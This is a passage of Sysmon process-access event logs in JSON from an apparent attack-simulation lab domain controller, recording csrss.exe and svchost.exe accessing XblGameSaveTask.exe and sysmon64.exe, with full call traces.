{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6812,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001000800900}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\System32\\XblGameSaveTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001000800900}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\System32\\XblGameSaveTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6813,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6814,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6815,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6816,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6817,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6818,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6819,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6820,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 